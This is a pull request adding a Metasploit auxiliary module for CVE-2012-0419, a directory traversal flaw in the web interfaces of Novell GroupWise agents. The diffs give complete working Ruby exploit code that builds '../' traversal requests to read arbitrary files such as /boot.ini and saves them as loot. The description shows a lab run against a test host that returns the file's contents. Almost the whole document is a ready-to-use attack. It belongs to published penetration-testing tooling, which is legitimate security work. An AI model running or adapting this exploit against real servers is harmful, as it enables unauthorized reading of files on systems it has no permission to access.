### PR TITLE
Added module for CVE-2012-0419

### DIFF
--- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb
+++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb
@@ -1,0 +1,82 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Novell Groupwise Agents HTTP Directory Traversal',
+			'Description'    => %q{
+					This module exploits a directory traversal vulnerability in Novell Groupwise.
+				The vulnerability exists in the web interface of both the Post Office and the
+				MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2
+				over Windows 2003 SP2.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'r () b13$', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-0419' ],
+					[ 'OSVDB', '85801' ],
+					[ 'BID', '55648' ],
+					[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7010772' ]
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(7181), # Also 7180 can be used
+				OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+				OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 10])
+			], self.class)
+	end
+
+	def run_host(ip)
+		# No point to continue if no filename is specified
+		if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
+			vprint_error("#{rhost}:#{rport} - Please supply FILEPATH")
+			return
+		end
+
+		travs = ""
+		travs << "../" * datastore['DEPTH']
+
+		travs = normalize_uri("/help/", travs, datastore['FILEPATH'])
+
+		vprint_status("#{rhost}:#{rport} - Sending request...")
+		res = send_request_cgi({
+			'uri'          => travs,
+			'method'       => 'GET',
+		})
+
+		if res and res.code == 200
+			contents = res.body
+			fname = File.basename(datastore['FILEPATH'])
+			path = store_loot(
+				'novell.groupwise',
+				'application/octet-stream',
+				ip,
+				contents,
+				fname
+			)
+			print_good("#{rhost}:#{rport} - File saved in: #{path}")
+		else
+			vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+			return
+		end
+	end
+end

--- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb
+++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb
@@ -45,10 +45,19 @@ class Metasploit3 < Msf::Auxiliary
 			], self.class)
 	end
 
+	def is_groupwise?
+		res = send_request_raw({'uri'=>'/'})
+		if res and res.headers['Server'].to_s =~ /GroupWise/
+			return true
+		else
+			return false
+		end
+	end
+
 	def run_host(ip)
-		# No point to continue if no filename is specified
-		if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
-			vprint_error("#{rhost}:#{rport} - Please supply FILEPATH")
+
+		if not is_groupwise?
+			vprint_error("#{rhost}:#{rport} - This isn't a GroupWise Agent HTTP Interface")
 			return
 		end
 


### PR DESCRIPTION
Tested with Groupwise 8.02HP2 over windows 2003 sp2, which can be downloaded from:

http://download.novell.com/protected/Summary.jsp?buildid=HJuDB3wNoeM~

In order to install groupwise a novell edirectory tree must be setup first.

```
msf > use auxiliary/scanner/http/groupwise_agents_http_traversal 
msf  auxiliary(groupwise_agents_http_traversal) > set rhosts 192.168.1.137
rhosts => 192.168.1.137
msf  auxiliary(groupwise_agents_http_traversal) > run

[+] 192.168.1.137:7181 - File saved in: /Users/juan/.msf4/loot/20130207204100_default_192.168.1.137_novell.groupwise_850949.ini
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(groupwise_agents_http_traversal) > cat /Users/juan/.msf4/loot/20130207204100_default_192.168.1.137_novell.groupwise_850949.ini
[*] exec: cat /Users/juan/.msf4/loot/20130207204100_default_192.168.1.137_novell.groupwise_850949.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect

```
